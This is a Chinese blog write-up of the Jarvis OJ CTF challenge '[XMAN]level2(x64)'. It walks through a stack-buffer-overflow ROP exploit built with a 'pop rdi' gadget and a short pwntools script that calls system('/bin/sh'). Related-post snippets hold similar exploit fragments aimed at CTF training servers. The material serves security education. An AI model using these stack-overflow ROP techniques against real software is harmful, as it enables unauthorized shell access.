18.9.19 Jarvis OJ PWN----[XMAN]level2(x64)

最新推荐文章于 2021-02-03 11:24:53 发布
最新推荐文章于 2021-02-03 11:24:53 发布
阅读量315 收藏
点赞数
分类专栏: PWN_WP 文章标签: [XMAN]level2(x64) PWN Jarvis OJ
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42192672/article/details/82772955
版权

先checksec一下

可以栈溢出,我们可以看到文件里有system函数,有/bin/sh字符串,美滋滋

64位函数的参数传递顺序和32位不同,传参顺序:rdi,rsi,rdx,rcx,r8,r9,栈,所以要把\bin\sh的地址放到rdi里

找一下可溢出的地方,在read函数里

关键点其实就是找出rdi地址(参考大佬的教学)

指令语句:ROPgadget --binary level2_x64 --only "pop|ret"|grep rdi

结果:

上脚本

#代码主体

cn.recv()
bin_addr=bin.search('/bin/sh').next()
system_addr=bin.symbols['system']
rdi= 0x00000000004006b3
payload='a'*(0x80+0x08)+p64(rdi)+p64(bin_addr)+p64(system_addr)
cn.sendline(payload)
cn.interactive()

 

xiaoyuyulala
关注
专栏目录
笔记向——PWN jarvis oj level2
m0_52133692的博客
12-07 176
题目链接:https://dn.jarvisoj.com/challengefiles/level2.54931449c557d0551c4fc2a10f4778a1 nc pwn2.jarvisoj.com 9878 0x01分析漏洞 先查看文件类型,再运行一下文件 检查保护措施 补充: checksec :是用来检查可执行文件属性的。 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,lin
18.9.19 Jarvis OJ PWN----[XMAN]level3
qq_42192672的博客
09-19 382
打开压缩包,看到了两个文件,surprise! 有个lib文件 checksec一波,发现没有保护栈 那就先找到可以栈溢出的地方哟,如下 可是问题来了,没有system函数,也没有/bin/sh字符串,但是在链接库(lib文件)中可以找到,如下 我们显然必须要知道system函数与/bin/sh字符在内存中的地址,之前我也不知道该怎么找,开始向大佬学姿势 key_point:...
Jarvis Oj Pwn 学习笔记-level2
baoan4763的博客
05-31 159
32位构造栈参数溢出! 恭敬地呈上链接: https://files.cnblogs.com/files/Magpie/level2.rar nc pwn2.jarvisoj.com 9878 首先....日常checksec: 程序扔进IDA锅里: 找到了溢出点~下面我们开始食用: 既然有调用system函数,肯定是可以直接call一波的,只是还缺一个参数,我...
jarvisoj——[XMAN]]level2(x64)
王嘟嘟的博客
07-19 374
题目 Wp 这里检查一下基础项 这里看了一下,发现还是read这里出现了问题,需要进行覆盖 构造一下payload from pwn import * r=process("./level2_x64") #r=remote('pwn2.jarvisoj.com',9882) e=ELF('./level2_x64') sys_addr=e.symbols['system'] bin_addr=e.search("/bin/sh").next() pop_rdi=0x4006b3 payload='
PWN_JarvisOJ_Level2_x64
michaelinfinity的博客
03-16 1432
关于level2我就不多做赘述了。这道题和level2之间的区别就是一个是32位的栈溢出,另一个就是64位的栈溢出。 32位的函数在调用栈的时候是: 调用函数地址->函数的返回地址->参数n->参数n-1....->参数1 64位的函数在调用栈的时候是: 前六个参数按照约定存储在寄存器:rdi,rsi,rdx,rcx,r8,r9中。 ...
(Jarvis Oj)(Pwn) level2
Nothing
04-19 1078
(Jarvis Oj)(Pwn) level2 首先用checksec查一下保护。这次NX开启了。 用ida反汇编,找到溢出点。 这次system函数又出现了。于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,于是记录下地址(或者...
18.9.19 Jarvis OJ PWN----Smashes
qq_42192672的博客
09-19 544
先checksec一下 我的天,有栈保护,nx,咋办…… IDA进去,我们可以看见有个函数挺关键的,如下 我们可以看到stdin是可以无限输入的,但是只有接收输入时接收到'\n',才会继续执行(跳出while循环),找不出栈溢出的办法 然后看了大佬的操作之后发现:可以故意触发canary来攻击(SSP(Stack Smashing Protector ) leak) 先介绍一下好...
PyPI 官网下载 | jarvis_tools-2019.7.11-py2.py3-none-any.whl
02-07
标题中的"PyPI 官网下载 | jarvis_tools-2019.7.11-py2.py3-none-any.whl"表明我们讨论的是一个从Python Package Index(PyPI)官方源下载的软件包,名为`jarvis_tools`,其版本号为2019.7.11。这个软件包是针对...
Python库 | jarvis_ironman-5.3.1-py2.py3-none-any.whl
02-16
Python库“jarvis_ironman-5.3.1-py2.py3-none-any.whl”是一个用于Python开发的重要工具,特别适用于后端开发。这个库的版本为5.3.1,支持Python 2和Python 3两种解释器,表明它具有良好的向后兼容性,能满足不同...
Python库 | jarvis_tools-10.23.2018-py2.py3-none-any.whl
03-31
资源分类:Python库 所属语言:Python 资源全名:jarvis_tools-10.23.2018-py2.py3-none-any.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
jarvisoj——[XMAN]level2
王嘟嘟的博客
07-16 295
题目 Wp 查一下基础项,32位的,开了NX保护,开了NX就没法执行自己的shellcode了。 ida看一下 常规的调用,然后看vulnerable_function函数 很明显的read缓存区溢出,溢出大小为0x88 很好玩的是这个题中有/bin/sh,地址为0x0804A024 最后溢出结果就是 0x88*‘A’(缓存地址)+0x4*‘A’(返回地址)+函数地址+函数返回地址+参数 那么最后脚本就是: from pwn import * sh=remote("pwn2.jarvisoj.co
CTF PWN [XMAN]level2(x64)
qq_41743240的博客
04-08 422
CTF PWN [XMAN]level2(x64) 题目地址 首先进行checksec保护机制的查询 发现只开了NX,所以不能利用shellcode方式获取shell,这里采用ROP方式获取shell IDA反编译查看伪源码 程序非常简单,两个函数 main: vulnerable_function: 在vulnerable_function有个问题,buf申请空间为0x80字节,然而可以读...
18.9.18 Jarvis OJ PWN----[XMAN]level2
qq_42192672的博客
09-18 218
先检测文件 我们可以看到没有栈保护,可以利用栈溢出 拖进IDA 先是一个vulnerable_function函数,同时在函数列表中我们可以看到有system函数,我们可以把returnaddress牵引到system函数上,执行/bin/sh语句 buf的偏移量是0x88个字节,花0x04个字节覆盖ebp,然后伪造returnsddress跳转到system,再加上用来给syst...
JarvisOJ level2x64
PLpa的博客
07-09 531
这题和level2的漏洞和处理方式差不多,只不过level2是x86而这题是x64的 前言: 首先,我们先看一下x64和x86的区别: linux_64与linux_86的区别主要有两点:首先是内存地址的范围由32位变成了64位。但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常。其次是函数参数的传递方式发生了改变,x86中参数都是保存在栈上,但在x64中的前六个参...
[Jarvis OJ - PWN]——[XMAN]level2(x64)
Y_peak的博客
02-03 604
[Jarvis OJ - PWN]——[XMAN]level2(x64) 题目地址:https://www.jarvisoj.com/challenges 题目: checksec一下,是64位程序。开启了NX保护 在IDA看一下,main函数中有我们要的system函数, vulnerable_function函数中也有。不过可惜参数都不对,任取一个system地址就好就好。但是我们找到了栈溢出的利用函数read。buf距离rbp的距离为0x80 查找一下看看有没有**"/bin/sh"字符串
[JarvisOj][XMAN]level2
weixin_34088838的博客
07-29 84
老套路 checksec ida查看 覆盖掉 之后system地址再返回覆盖 最后/bin/sh地址 # -*- coding:utf-8 -*- from pwn import * sh = remote('pwn2.jarvisoj.com', 9878) # remote junk = 'a' * 0x88 fakebp...
CTF-PWN-level2(x64)(Jarvis OJ)
SuperGate的博客
02-15 506
这道题和level2的32位版本的漏洞一样,不过32位程序函数的参数是压在栈中的,而64位程序的前6个参数是存在寄存器中的,第7个开始才压入栈中。 由于我们的目的是将system函数的参数改为/bin/sh,所以我们考虑用pop edi ret 语句将字符串赋值给edi。 同样的,程序中hint存入了/bin/sh,我们直接使用即可。 system函数的地址也很容易获得,剩下的就是pop e...
[Jarvis OJ - PWN]——[XMAN]level2
Y_peak的博客
02-01 211
[Jarvis OJ - PWN]——[XMAN]level2 题目地址:https://www.jarvisoj.com/challenges 题目: 首先,checksec一下。32位并且没有开启PIE 在IDA中查看一下。main函数里面没有我们想要的,点开vulnerable_function函数。发现read函数,第一个参数为0,代表标准输入。可以利用栈溢出。 发现里面有system函数,但是里面的参数不是我们想要的,所以我们要覆盖一下它。按shift + F12,找到/bin/sh字符串
jarvisoj_level2_x64
、moddemod
06-17 537
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * context(log_level = 'debug') proc_name = './level2_x64' p =process(proc_name) p = remote('node3.buuoj.cn', 25838) elf = ELF(proc_name) system_addr = elf.sym['system'] bin_sh_str = 0x600a90 pop..
jarvisoj_level2
最新发布
08-13
JarvisOJLevel2题目中,给出了三个关于解题的代码片段的引用。引用和都是给出了关于解题的代码,其中引用是关于x64架构的代码,引用是关于i386架构的代码。这些代码都是用于获取Shell的payload。而引用则是对这个题目的解题思路的说明。 具体来说,在这个题目中,程序调用了system函数,并且存在/bin/sh字符串。通过对return address进行覆盖,可以将程序的控制流引导到system函数,并将/bin/sh字符串作为参数传递给它,从而获取Shell。其中,payload中的一些关键地址和字符串的具体值需要根据具体题目的情况来确定。 需要注意的是,这个题目的具体实现可能与上述引用中的代码有所不同,因此需要根据实际情况进行调整。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [jarvisoj_level2_x64](https://blog.csdn.net/zip471642048/article/details/125448386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [jarvisoj_level2](https://blog.csdn.net/m0_55086916/article/details/128089924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值